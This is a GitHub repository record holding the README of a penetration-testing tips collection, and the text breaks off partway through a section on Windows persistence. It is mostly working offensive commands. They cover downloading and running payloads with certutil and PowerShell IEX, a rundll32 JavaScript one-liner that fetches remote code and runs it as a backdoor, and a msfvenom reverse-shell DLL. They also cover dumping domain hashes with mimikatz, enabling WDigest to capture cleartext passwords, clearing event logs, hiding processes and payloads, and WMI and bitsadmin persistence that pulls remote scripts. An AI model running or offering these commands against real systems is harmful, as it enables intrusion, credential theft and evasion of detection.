{"id":13389682,"url":"https://github.com/3gstudent/Pentest-and-Development-Tips","last_synced_at":"2025-03-13T14:31:50.970Z","repository":{"id":41092792,"uuid":"102674227","full_name":"3gstudent/Pentest-and-Development-Tips","owner":"3gstudent","description":"A collection of pentest and development tips","archived":false,"fork":false,"pushed_at":"2022-05-26T02:51:51.000Z","size":369,"stargazers_count":1101,"open_issues_count":2,"forks_count":306,"subscribers_count":57,"default_branch":"master","last_synced_at":"2024-11-03T03:31:21.293Z","etag":null,"topics":[],"latest_commit_sha":null,"homepage":"","language":null,"has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":null,"status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/3gstudent.png","metadata":{"files":{"readme":"README-en.md","changelog":null,"contributing":null,"funding":null,"license":null,"code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null}},"created_at":"2017-09-07T01:07:53.000Z","updated_at":"2024-11-01T02:37:42.000Z","dependencies_parsed_at":"2022-07-30T21:08:05.881Z","dependency_job_id":null,"html_url":"https://github.com/3gstudent/Pentest-and-Development-Tips","commit_stats":null,"previous_names":[],"tags_count":0,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/3gstudent%2FPentest-and-Development-Tips","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/3gstudent%2FPentest-and-Development-Tips/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/3gstudent%2FPentest-and-Development-Tips/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/3gstudent%2FPentest-and-Development-Tips/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/3gstudent","download_url":"https://codeload.github.com/3gstudent/Pentest-and-Development-Tips/tar.gz/refs/heads/master","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":243422586,"owners_count":20288485,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":[],"created_at":"2024-07-30T13:01:26.303Z","updated_at":"2025-03-13T14:31:50.606Z","avatar_url":"https://github.com/3gstudent.png","language":null,"funding_links":[],"categories":["Others","Others (1002)"],"sub_categories":[],"readme":"# Pentest-and-Development-Tips\nA collection of pentest and development tips\n\nAuthor: 3gstudent\n\n### Statement\n\nThe following techniques should not be used for illegal purposes.\n\n---\n\n### Tips 1. Manual port detection\n\nNmap's -sV can detect the service version, but in some cases it must be manually detected to verify.\n\nUse Wireshark to get response packages is far less simple than using nc.\n\nEg.\n\nFor port 8001, use nc to connect the port and then enter a random string. You'll get the following result:\n\n```\n$ nc -vv localhost 8001  \nlocalhost [127.0.0.1] 8001 (?) open\nasd\nHTTP/1.1 400 Bad Request\nDate: Fri, 25 Aug 2017 12:15:25 GMT\nServer: Apache/2.4.23 (Debian)\nContent-Length: 301\nConnection: close\nContent-Type: text/html; charset=iso-8859-1\n\u003c!DOCTYPE HTML PUBLIC \"-//IETF//DTD HTML 2.0//EN\"\u003e\n\u003chtml\u003e\u003chead\u003e\n\u003ctitle\u003e400 Bad Request\u003c/title\u003e\n\u003c/head\u003e\u003cbody\u003e\n\u003ch1\u003eBad Request\u003c/h1\u003e\n\u003cp\u003eYour browser sent a request that this server could not understand.\u003cbr /\u003e\n\u003c/p\u003e\n\u003chr\u003e\n\u003caddress\u003eApache/2.4.23 (Debian) Server at 127.0.0.1 Port 8001\u003c/address\u003e\n\u003c/body\u003e\u003c/html\u003e\n```\n\nFrom this we know that this is an http service, because the string we sent is not a valid HTTP request, so we return a 400 Bad requests, we also get the system version is Debian, WebServer is Apache.\n\nReference: \n\n[《谈谈端口探测的经验与原理》](http://www.freebuf.com/articles/network/146087.html)\n\n\n---\n\n### Tips 2. Download files from Kali to windows\n\nKali:\n\n```\npython -m SimpleHTTPServer 80\n```\n\nWindows:\n\n```\ncertutil.exe -urlcache -split -f http://192.168.1.192/Client.exe 1.exe\ncertutil.exe -urlcache -split -f http://192.168.1.192/Client.exe delete\n```\n\nReference: \n\n[《渗透测试中的certutil.exe》](https://3gstudent.github.io/%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95%E4%B8%AD%E7%9A%84certutil.exe)\n\n---\n\n### Tips 3. Configure the computer in WORKGROUP to support the IPC connection\n\nAdd user:\n\n```\nnet user test test /add\nnet localgroup administrators test /add\n```\n\nModify the registry to support remote connections:\n\n```\nreg add hklm\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System /v LocalAccountTokenFilterPolicy /t REG_DWORD /d 1\n```\n\nIPC connection:\n\n```\nnet use \\\\192.168.1.195 test /u:test\n```\n\n---\n\n### Tips 4. Cleanup the Windows XML Event Log(evtx)\n\nGet a list of evtx log categories:\n\n```\nwevtutil el \u003e1.txt\n```\n\nGet statistics for a single evtx log category:\n\nEg.\n\n```\nwevtutil gli \"windows powershell\"\n```\n\nOutput:\n\n```\ncreationTime: 2016-11-28T06:01:37.986Z\nlastAccessTime: 2016-11-28T06:01:37.986Z\nlastWriteTime: 2017-08-08T08:01:20.979Z\nfileSize: 1118208\nattributes: 32\nnumberOfLogRecords: 1228\noldestRecordNumber: 1\n```\n\nView the specific content of the specified evtx log:\n\n```\nwevtutil qe /f:text \"windows powershell\"\n```\n\nFind the specified amount of log content:\n\n```\nwevtutil qe /f:text \"windows powershell\" /c:20\n```\n\nDelete all information for a single log category:\t\n\n```\nwevtutil cl \"windows powershell\"\n```\n\nReference: \n\n[《渗透技巧-Windows日志的删除与绕过》](https://3gstudent.github.io/%E6%B8%97%E9%80%8F%E6%8A%80%E5%B7%A7-Windows%E6%97%A5%E5%BF%97%E7%9A%84%E5%88%A0%E9%99%A4%E4%B8%8E%E7%BB%95%E8%BF%87)\n\nRemove individual lines from Windows XML Event Log (EVTX) files:\n\n[《渗透技巧——Windows单条日志的删除》](https://3gstudent.github.io/%E6%B8%97%E9%80%8F%E6%8A%80%E5%B7%A7-Windows%E5%8D%95%E6%9D%A1%E6%97%A5%E5%BF%97%E7%9A%84%E5%88%A0%E9%99%A4)\n\n---\n\n### Tips 5. Destroy the Event Log Service \n\nThe thread that implements the logging function is terminated by calling TerminateThread, which disables the logging function, but the Windows Event Log service is not destroyed and the state is still running.\n\nPowershell:\n\nhttps://github.com/hlldz/Invoke-Phant0m\n\nC++:\n\nhttps://github.com/3gstudent/Windwos-EventLog-Bypass\n\nReference: \n\n[《渗透技巧-Windows日志的删除与绕过》](https://3gstudent.github.io/%E6%B8%97%E9%80%8F%E6%8A%80%E5%B7%A7-Windows%E6%97%A5%E5%BF%97%E7%9A%84%E5%88%A0%E9%99%A4%E4%B8%8E%E7%BB%95%E8%BF%87)\n\n[《利用API-NtQueryInformationThread和I_QueryTagInformation实现对Windwos日志监控的绕过》](https://3gstudent.github.io/%E5%88%A9%E7%94%A8API-NtQueryInformationThread%E5%92%8CI_QueryTagInformation%E5%AE%9E%E7%8E%B0%E5%AF%B9Windwos%E6%97%A5%E5%BF%97%E7%9B%91%E6%8E%A7%E7%9A%84%E7%BB%95%E8%BF%87)\n\n\n---\n\n### Tips 6. Process hiding under Win7 and Windows Server 2008 R2\n\nUse global APIhooks to modify the registry.\n\nDownload project: https://github.com/subTee/AppInitGlobalHooks-Mimikatz\n\nModify the code to specify the program name cldr.exe to be hidden, compile into cldr.dll, cldr.dll in `C:\\ProgramData\\Microsoft\\HelpLibrary\\`\n\nAdministrator privileges:\n\n```\nreg add \"hklm\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Windows\" /v RequireSignedAppInit_DLLs /t REG_DWORD /d 0\nreg add \"hklm\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Windows\" /v LoadAppInit_DLLs /t REG_DWORD /d 1 /f\nreg add \"hklm\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Windows\" /v AppInit_DLLs /t REG_SZ /d \"C:\\\\ProgramData\\\\Microsoft\\\\HelpLibrary\\\\cldr.dll\" /f\n```\n\nAt this time, cldr.exe does not exist in the task manager process list, cldr.exe does not exist in Process Explorer, and cldr.exe does not exist in Tasklist.exe.\n\nFor 64-bit systems:\n\nAdministrator privileges:\n\n```\nreg add \"hklm\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Windows\" /v RequireSignedAppInit_DLLs /t REG_DWORD /d 0\nreg add \"hklm\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Windows\" /v LoadAppInit_DLLs /t REG_DWORD /d 1 /f\nreg add \"hklm\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Windows\" /v AppInit_DLLs /t REG_SZ /d \"C:\\\\ProgramData\\\\Microsoft\\\\HelpLibrary\\\\cldrx64.dll\" /f\nreg add \"hklm\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Windows\" /v RequireSignedAppInit_DLLs /t REG_DWORD /d 0\nreg add \"hklm\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Windows\" /v LoadAppInit_DLLs /t REG_DWORD /d 1 /f\nreg add \"hklm\\SOFTWARE\\Wow6432Node\\Microsoft\\Windows NT\\CurrentVersion\\Windows\" /v AppInit_DLLs /t REG_SZ /d \"C:\\\\ProgramData\\\\Microsoft\\\\HelpLibrary\\\\cldr.dll\" /f\n```\n\nReference:  \n\n[《利用globalAPIhooks在Win7系统下隐藏进程》](https://3gstudent.github.io/%E5%88%A9%E7%94%A8globalAPIhooks%E5%9C%A8Win7%E7%B3%BB%E7%BB%9F%E4%B8%8B%E9%9A%90%E8%97%8F%E8%BF%9B%E7%A8%8B)\n\n---\n\n### Tips 7. Execution order of exe and com files with the same name\n\nIf a path contains both exe and com files with the same name, such as test.exe and test.com. Enter test (without the file suffix) through the command line, and the com file will be run first.\n\nThe generation of COM files only needs to change the suffix name of the exe file to com.\n\nReference:  \n\n《A dirty way of tricking users to bypass UAC》\n\n---\n\n### Tips 8.  Windows system certificate generation and registration\n\nCertificate generation and signature：\n\n```\nmakecert -n \"CN=Microsoft Windows\" -r -sv Root.pvk Root.cer\ncert2spc Root.cer Root.spc\npvk2pfx -pvk Root.pvk -pi 12345678password -spc Root.spc -pfx Root.pfx -f\nsigntool sign /f Root.pfx /p 12345678password test.exe\n```\n\nIt will generate four files: Root.cer, Root.pfx, Root.pvk, and Root.spc, and test.exe will be digitally signed.\n\nCertificate registration:\n\nAdd the certificate to localmachine(Administrator privileges):\n\n```\ncertmgr.exe -add -c Root.cer -s -r localmachine root\n```\n\nReference:  \n\n《A dirty way of tricking users to bypass UAC》\n\n---\n\n### Tips 9.  Use HTML Application(hta) to run VBScript, and then use VBScript to run Powershell scipt\n\ntest.hta：\n\n```\n\u003cHTML\u003e \n\u003cHEAD\u003e \n\u003cscript language=\"VBScript\"\u003e\n    Set WshShell = CreateObject(\"WScript.Shell\")\n    Connect=\"powershell -nop -windows hidden -E YwBhAGwAYwAuAGUAeABlAA==\"\n    WshShell.Run Connect, 4, true\n\u003c/script\u003e\n\u003cHTA:APPLICATION ID=\"test\"\nWINDOWSTATE = \"minimize\"\u003e\n\u003c/HEAD\u003e \n\u003cBODY\u003e \n\u003c/BODY\u003e \n\u003c/HTML\u003e \n```\n\nReference:  \n\n《Bypass McAfee Application Control——Code Execution》\n\n---\n\n### Tips 10. Write dll by c# and load dll via rundll32.exe or regsvr32\n\nBy default, c# cannot declare exported functions, but can be implemented by adding UnmanagedExports.\n\nOf course, dlls written by c# need to be run in the corresponding version of the .NET environment. The dlls written in C++ are more general.\n\nThe dll can be loaded by rundll32.exe or regsvr32, but the dll is required to contain a specific export function.\n\nReference:\n\n《Code Execution of Regsvr32.exe》\n\n---\n\n### Tips 11. Introduction to cpl file under Windows\n\n\nEssentially a DLL file with a suffix of cpl and an export function CPLApplet.\n\nFive methods of implementation:\n\n(1) Double click to run directly\n\n(2) cmd\n\n```\nrundll32 shell32.dll,Control_RunDLL test.cpl\n```\n\n(3) cmd\n\n```\ncontrol test.cpl\n```\n\n(4) vbs\n\n```\nDim obj\nSet obj = CreateObject(\"Shell.Application\")\nobj.ControlPanelItem(\"test.cpl\")\n```\n\n(5) js\n\n```\nvar a = new ActiveXObject(\"Shell.Application\");\na.ControlPanelItem(\"c:\\\\test\\\\test.cpl\");\n```\n\nReference:\n\n《CPL文件利用介绍》\n\n---\n\n### Tips 12. Use rundll32 via cmd to execute a piece of code to get a shell of Windows\n\nServer:\n\nhttps://github.com/3gstudent/Javascript-Backdoor/blob/master/JSRat.ps1\n\nClient:\n\n```\nrundll32.exe javascript:\"\\..\\mshtml,RunHTMLApplication \";document.write();h=new%20ActiveXObject(\"WinHttp.WinHttpRequest.5.1\");w=new%20ActiveXObject(\"WScript.Shell\");try{v=w.RegRead(\"HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Internet%20Settings\\\\ProxyServer\");q=v.split(\"=\")[1].split(\";\")[0];h.SetProxy(2,q);}catch(e){}h.Open(\"GET\",\"http://192.168.174.131/connect\",false);try{h.Send();B=h.ResponseText;eval(B);}catch(e){new%20ActiveXObject(\"WScript.Shell\").Run(\"cmd /c taskkill /f /im rundll32.exe\",0,true);}\n```\n\nOf course, the RAT tool can also be loaded by:\n\n- vbs\n- js\n- exe\n- dll\n- shellcode\n\nReference:\n\n《JavaScript Backdoor》\n\n《JavaScript Phishing》\n\n---\n\n### Tips 13. The key of putty\u0026pageant can be restored by memory dump\n\nBoth windows and Linux apply\n\nReference:\n\n《Memory Dump利用实例》\n\n---\n\n### Tips 14. Phishing for Visual Studio\n\nVisual C++:\n- Modify the .vcxproj file\n\nVisual Basic:\n- Modify the .vbproj file\n\nVisual F#:\n- Modify the .fsproj file\n\nAbility to execute arbitrary code when compiling for any of the above projects using Visual Studio\n\nReference:\n\n《Pay close attention to your download code——Visual Studio trick to run code when building》\n\n---\n\n### Tips 15. When a 32-bit program is executed under a 64-bit Windows system, there is a redirect if there is an operation on the registry and files.\n\nFor registry operations:\n\nThe actual path to access HKLM\\Software\\ is HKLM\\Software\\Wow6432Node\\\n\nFor file operations:\n\nThe actual path to access c:\\windows\\Sysnative\\ is c:\\windows\\system32\\\nThe actual path to access c:\\windows\\system32\\ is c:\\windows\\SysWOW64\\\n\nReference:\n\n《关于32位程序在64位系统下运行中需要注意的重定向问题》\n\n---\n\n### Tips 16. Dump all the hash of the domain user from the domain controller\n\n#### Method 1:\n\nCopy ntds.dit：\n\nUse NinjaCopy, https://github.com/3gstudent/NinjaCopy (Author: Joe Bialek, Twitter: @JosephBialek)\n\nDump hash：\n\nUse quarkspwdump, https://github.com/quarkslab/quarkspwdump\n\n```\nesentutl /p /o ntds.dit\nQuarksPwDump.exe -dhb -hist -nt c：\\test\\ntds.dit -o c：\\test\\log.txt\n```\n\n#### Method 2:\n\nUse DSInternals PowerShell Module, https://www.dsinternals.com/wp-content/uploads/DSInternals_v2.8.zip\n\nApplicable conditions:\n\nWindows PowerShell 3.0 or 3.0+\n\n.NET Framework 4.0 or 4.0+\n\nReference:\n\n《导出当前域内所有用户hash的技术整理》\n\n《利用Powershell快速导出域控所有用户Hash》\n\n#### Method 3:\n\nmimikatz：\n\n```\nmimikatz.exe \"lsadump::dcsync /domain:test.local /all /csv\" exit\n```\n\n---\n\n### Tips 17. Dump Clear-Text Password under Windows\n\nWindows Server 2012 cannot use mimikatz to export clear-text password by default, as are some Windows Server 2008.\n\nWorkaround: Enable Wdigest Auth\n\ncmd:\n\n```\nreg add HKLM\\SYSTEM\\CurrentControlSet\\Control\\SecurityProviders\\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /f\n```\n\nor\n\npowershell:\n\n```\nSet-ItemProperty -Path HKLM:\\SYSTEM\\CurrentControlSet\\Control\\SecurityProviders\\WDigest -Name UseLogonCredential -Type DWORD -Value 1\n```\n\nRestart or user login again, can export clear-text password\n\nReference:\n\n《域渗透——Dump Clear-Text Password after KB2871997 installed》\n\n---\n\n### Tips 18. The new password of the domain controller can be recorded in real time through Hook PasswordChangeNotify.\n\nOf course, you can choose to save locally or upload your password to the server.\n\nReference:\n\n《域渗透——Hook PasswordChangeNotify》\n\n---\n\n### Tips 19. Remember to pay attention to the local administrator account of the host in the domain \n\nIf the administrator neglects that the hosts in the domain use the same local administrator account, you can remotely log in to other hosts in the domain through pass-the-hash.\n\nReference:\n\n《域渗透——Local Administrator Password Solution》\n\n---\n\n### Tips 20. Get the dll export function through powershell\n\nhttps://github.com/FuzzySecurity/PowerShell-Suite/blob/master/Get-Exports.ps1\n\n```\nGet-Exports -DllPath c:\\Windows\\system32\\dimsjob.dll -ExportsToCpp C:\\test\\export.txt\n```\n\nReference:\n\n[《Study Notes Weekly No.3(Use odbcconf to load dll \u0026 Get-Exports \u0026 ETW USB Keylogger)》](https://3gstudent.github.io/Study-Notes-Weekly-No.3(Use-odbcconf-to-load-dll-\u0026-Get-Exports-\u0026-ETW-USB-Keylogger))\n\n---\n\n### Tips 21. Parameter hiding tips for shortcuts\n\nPut the payload after 260 null characters, so you can't view the payload in the file attribute. It can be used to hide the payload in the shortcut, trick the user to click, and conceal the execution code.\n\nReference:\n\n[《渗透技巧——快捷方式文件的参数隐藏技巧》](https://3gstudent.github.io/%E6%B8%97%E9%80%8F%E6%8A%80%E5%B7%A7-%E5%BF%AB%E6%8D%B7%E6%96%B9%E5%BC%8F%E6%96%87%E4%BB%B6%E7%9A%84%E5%8F%82%E6%95%B0%E9%9A%90%E8%97%8F%E6%8A%80%E5%B7%A7)\n\n---\n\n### Tips 22. 32-bit programs can remotely inject 64-bit processes\n\nPOC：\n\nhttps://github.com/3gstudent/CreateRemoteThread/blob/master/CreateRemoteThread32to64.cpp\n\nReference:\n\n[《32位程序对64位进程的远程注入实现》](https://3gstudent.github.io/32%E4%BD%8D%E7%A8%8B%E5%BA%8F%E5%AF%B964%E4%BD%8D%E8%BF%9B%E7%A8%8B%E7%9A%84%E8%BF%9C%E7%A8%8B%E6%B3%A8%E5%85%A5%E5%AE%9E%E7%8E%B0)\n\n---\n\n### Tips 23. The process  needs to be downgraded in some cases\n\nProcesses that use sytem permissions may encounter the following issues:\n\n1. Unable to get the current user's file content\n\nFor example, the user's screen cannot be captured\n\n2. Environmental variables are different\n\nTherefore need to reduce the rights to the current user\n\n#### Method 1: Use SelectMyParent.exe\n\nhttps://github.com/3gstudent/From-System-authority-to-Medium-authority\n\nReference:\n\n[《渗透技巧——程序的降权启动》](https://3gstudent.github.io/%E6%B8%97%E9%80%8F%E6%8A%80%E5%B7%A7-%E7%A8%8B%E5%BA%8F%E7%9A%84%E9%99%8D%E6%9D%83%E5%90%AF%E5%8A%A8)\n\n#### Method 2: Use msdtc\n\nUse msdtc will load oci.dll with system privilege, but execute it in the admin privilege cmd: `msdtc -install`, it will start calc.exe with high permission.\n\nReference:\n\n[《Use msdtc to maintain persistence》](https://3gstudent.github.io/Use-msdtc-to-maintain-persistence)\n\n---\n\n### Tips 24. You can install WinPcap on Windows by command line, so you can use nmap and Masscan on the host you already control\n\nReference:\n\n[《渗透技巧——Windows平台运行Masscan和Nmap》](https://3gstudent.github.io/%E6%B8%97%E9%80%8F%E6%8A%80%E5%B7%A7-Windows%E5%B9%B3%E5%8F%B0%E8%BF%90%E8%A1%8CMasscan%E5%92%8CNmap)\n\n---\n\n### Tips 25. How to execute mimikatz on Windows platform\n\n#### Method 1: Use powershell\n\n```\npowershell \"IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds\"\n```\n\n#### Method 2: Use InstallUtil.exe\n\n```\nC:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe /unsafe /out:PELoader.exe PELoader.cs\nC:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\InstallUtil.exe /logfile= /LogToConsole=false /U PELoader.exe\n```\n\nReference:\n\n《利用白名单绕过360实例》\n\n《利用白名单绕过限制的更多测试》\n\n#### Method 3:  Use regsvr32.exe\n\nhttps://gist.githubusercontent.com/subTee/c3d5030bb99aa3f96bfa507c1c184504/raw/24dc0f93f1ebdda7c401dd3890259fa70d23f75b/regsvr32-katz.cs\n\nEncapsulate mimikatz into dll and run mimkatz via regsvr32 passed in parameters\n\n```\nrundll32 katz.dll,EntryPoint log coffee exit  \n```\n\nReference:\n\n《Code Execution of Regsvr32.exe》\n\n#### Method 4: Use msbuild.exe\n\nDownload the xml file and save it as a.xml:\n\nhttps://github.com/3gstudent/msbuild-inline-task/blob/master/executes%20mimikatz.xml\n\ncmd：\n\n```\nC:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\msbuild.exe executes a.xml\n```\n\nReference:\n\n[《Use MSBuild To Do More》](https://3gstudent.github.io/Use-MSBuild-To-Do-More)\n\n#### Method 5: Use csi.exe\n\n```\n\"C:\\Program Files (x86)\\MSBuild\\14.0\\Bin\\csi.exe\" c:\\test\\katz.csx\n```\n\nReference:\n\n[《Study Notes Weekly No.4(Use tracker to load dll \u0026 Use csi to bypass UMCI \u0026 Execute C# from XSLT file)》](https://3gstudent.github.io/Study-Notes-Weekly-No.4(Use-tracker-to-load-dll-\u0026-Use-csi-to-bypass-UMCI-\u0026-Execute-C-from-XSLT-file))\n\n#### Method 6: Use the js/vbs script\n\nhttps://gist.github.com/subTee/5c636b8736530fb20c3d\n\nhttps://gist.github.com/subTee/b30e0bcc7645c790fcd993cfd0ad622f\n\nReference:\n\n[《利用JS加载.Net程序》](https://3gstudent.github.io/%E5%88%A9%E7%94%A8JS%E5%8A%A0%E8%BD%BD.Net%E7%A8%8B%E5%BA%8F)\n\n---\n\n### Tips 26. The location in the Windows system where you can store and read the payload.\n\n#### Method 1: WMI\n\nSave:\n\n```\n$StaticClass = New-Object Management.ManagementClass('root\\cimv2', $null,$null)\n$StaticClass.Name = 'Win32_Command'\n$StaticClass.Put()\n$StaticClass.Properties.Add('Command' , $Payload)\n$StaticClass.Put() \n```\n\nRead:\n\n```\n$Payload=([WmiClass] 'Win32_Command').Properties['Command'].Value\n```\n\nReference:\n\n《WMI Backdoor》\n\n#### Method 2: PE file containing digital signature\n\nUse the algorithm flaw of the file hash, hide the Payload from the PE file without affecting the digital signature of the PE file.\n\nReference:\n\n[《隐写技巧-在PE文件的数字证书中隐藏Payload》](https://3gstudent.github.io/%E9%9A%90%E5%86%99%E6%8A%80%E5%B7%A7-%E5%9C%A8PE%E6%96%87%E4%BB%B6%E7%9A%84%E6%95%B0%E5%AD%97%E8%AF%81%E4%B9%A6%E4%B8%AD%E9%9A%90%E8%97%8FPayload)\n\n#### Method 3: Special ADS\n\n(1) ...\n\n```\ntype putty.exe \u003e ...:putty.exe\nwmic process call create c:\\test\\ads\\...:putty.exe\n```\n\n(2) Special COM files\n\n```\ntype putty.exe \u003e \\\\.\\C:\\test\\ads\\COM1:putty.exe\nwmic process call create \\\\.\\C:\\test\\ads\\COM1:putty.exe\n```\n\n(3) Disk root directory\n\n```\ntype putty.exe \u003eC:\\:putty.exe \nwmic process call create C:\\:putty.exe\n```\n\nReference:\n\n[《Hidden Alternative Data Streams的进阶利用技巧》](https://3gstudent.github.io/Hidden-Alternative-Data-Streams%E7%9A%84%E8%BF%9B%E9%98%B6%E5%88%A9%E7%94%A8%E6%8A%80%E5%B7%A7)\n\n---\n\n### Tips 27. Information worth collecting in Windows system\n\n#### (1) Registered WMI information\n\n```\nwmic /NAMESPACE:\"\\\\root\\subscription\" PATH __EventFilter GET __RELPATH /FORMAT:list\nwmic /NAMESPACE:\"\\\\root\\subscription\" PATH CommandLineEventConsumer GET __RELPATH /FORMAT:list\nwmic /NAMESPACE:\"\\\\root\\subscription\" PATH __FilterToConsumerBinding GET __RELPATH /FORMAT:list\n```\n\nThe administrator may use WMI to record the attacker's call to WMI, which can be viewed by wmic. Of course, the monitoring function can be disabled by wmic.\n\nReference:\n\n[《Study Notes Weekly No.1(Monitor WMI \u0026 ExportsToC++ \u0026 Use DiskCleanup bypass UAC))》](https://3gstudent.github.io/Study-Notes-Weekly-No.1(Monitor-WMI_ExportsToC++_Use-DiskCleanup-bypass-UAC))\n\n#### (2)Computer Name\n\n```\nwmic /node:192.168.1.10 /user:\"administrator\" /password:\"123456\" /NAMESPACE:\"\\\\root\\CIMV2\" PATH Win32_OperatingSystem get CSName\n```\n\n---\n\n### Tips 28. Meterpreter under Windows\n\n#### Method 1: Loading dll via rundll32\n\nmsf：\n\n```\nmsfvenom -p windows/meterpreter/reverse_http -f dll LHOST=192.168.174.133 LPORT=8080\u003e./a.dll\n```\n\nGenerate a.dll and upload it to the host\n\nExecute `rundll32.exe a.dll, Control_RunDLL`,\n\n#### Method 2: Via cpl\n\nhttps://raw.githubusercontent.com/3gstudent/test/master/meterpreter_reverse_tcp.cpp\n\nGenerate dll, rename it to cpl, double click to execute\n\n#### Method 3: Via powershell\n\nhttps://raw.githubusercontent.com/3gstudent/Code-Execution-and-Process-Injection/master/2-CodeExecution-Meterpreter.ps1\n\n---\n\n### Tips 29. How to load dll in Windows system\n\n#### Method 1: rundll32\n\n```\nrundll32 a.dll,EntryPoint\n```\n\n#### Method 2：regsvr32\n\n```\nregsvr32 a.dll\n```\n\nReference:\n\n《Code Execution of Regsvr32.exe》\n\n#### Method 3：odbcconf\n\n```\nodbcconf.exe /a {regsvr c:\\test\\odbcconf.dll}\n```\n\nReference:\n\n[《Study Notes Weekly No.3(Use odbcconf to load dll \u0026 Get-Exports \u0026 ETW USB Keylogger)》](https://3gstudent.github.io/Study-Notes-Weekly-No.3(Use-odbcconf-to-load-dll-\u0026-Get-Exports-\u0026-ETW-USB-Keylogger))\n\n#### Method 4：Tracker\n\n```\nTracker.exe /d test.dll /c svchost.exe\n```\n\nTracker.exe contains Microsoft digital signatures that bypass the limitations of the application whitelist\n\nReference:\n\n[《Study Notes Weekly No.4(Use tracker to load dll \u0026 Use csi to bypass UMCI \u0026 Execute C# from XSLT file)》](https://3gstudent.github.io/Study-Notes-Weekly-No.4(Use-tracker-to-load-dll-\u0026-Use-csi-to-bypass-UMCI-\u0026-Execute-C-from-XSLT-file))\n\n#### Method 5: Excel.Application object's RegisterXLL() method\n\nPrerequisite: Microsoft Office software is installed\n\n1.rundll32\n\n```\nrundll32.exe javascript:\"\\..\\mshtml,RunHTMLApplication \";x=new%20ActiveXObject('Excel.Application');x.RegisterXLL('C:\\\\test\\\\messagebox.dll');this.close();\n```\n\n2.js\n\n```\nvar excel = new ActiveXObject(\"Excel.Application\");\nexcel.RegisterXLL(\"C:\\\\test\\\\messagebox.dll\");\n```\n\n3.powershell\n\n```\n$excel = [activator]::CreateInstance([type]::GetTypeFromProgID(\"Excel.Application\"))\n$excel.RegisterXLL(\"C:\\test\\messagebox.dll\")\n```\n\nReference:\n\n[《Use Excel.Application object's RegisterXLL() method to load dll》](https://3gstudent.github.io/Use-Excel.Application-object's-RegisterXLL()-method-to-load-dll)\n\n#### Method 6: xwizard.exe\n\nCopy xwizard.exe from %windir%\\system32\\ to the new directory C:\\x.\n\nRename msg.dll to xwizards.dll and save it at C:\\x.\n\nCommand line execution:\n\n```\nxwizard processXMLFile 1.txt\n```\n\nIt will load C:\\x\\xwizards.dll.\n\nReference:\n\n[《Use xwizard.exe to load dll》](https://3gstudent.github.io/Use-xwizard.exe-to-load-dll)\n\n---\n\n### Tips 30. Windows Persistence\n\n#### Method 1: bitsadmin\n\n```\nbitsadmin /create backdoor\nbitsadmin /addfile backdoor %comspec%  %temp%\\cmd.exe\nbitsadmin.exe /SetNotifyCmdLine backdoor regsvr32.exe \"/u /s /i:https://raw.githubusercontent.com/3gstudent/SCTPersistence/master/calc.sct scrobj.dll\"\nbitsadmin /Resume backdoor\n```\n\nReference:\n\n《Use bitsadmin to maintain persistence and bypass Autoruns》\n\n#### Method 2: mof\n\n```\npragma namespace(\"\\\\\\\\.\\\\root\\\\subscription\")    \ninstance of __EventFilter as $EventFilter\n{\n    EventNamespace = \"Root\\\\Cimv2\";\n    Name  = \"filtP1\";\n    Query = \"Select * From __InstanceModificationEvent \"\n            \"Where TargetInstance Isa \\\"Win32_LocalTime\\\" \"\n            \"And TargetInstance.Second = 1\";\n    QueryLanguage = \"WQL\";\n};    \ninstance of ActiveScriptEventConsumer as $Consumer\n{\n    Name = \"consP1\";\n    ScriptingEngine = \"JScript\";\n    ScriptText = \"GetObject(\\\"script:https://raw.githubusercontent.com/3gstudent/Javascript-Backdoor/master/test\\\")\";\n};    \ninstance of __FilterToConsumerBinding\n{\n    Consumer   = $Consumer;\n    Filter = $EventFilter;\n};\n```\n\nAdministrator privileges:\n\n```\nmofcomp test.mof\n```\n\nReference:\n\n《WSC、JSRAT and WMI Backdoor》\n \n#### Method 3: wmi\n\nExecute notepad.exe every 60 seconds\n\n```\nwmic /NAMESPACE:\"\\\\root\\subscription\" PATH __EventFilter CREATE Name=\"BotFilter82\", EventNameSpace=\"root\\cimv2\",QueryLanguage=\"WQL\", Query=\"SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'\"\nwmic /NAMESPACE:\"\\\\root\\subscription\" PATH CommandLineEventConsumer CREATE Name=\"BotConsumer23\", 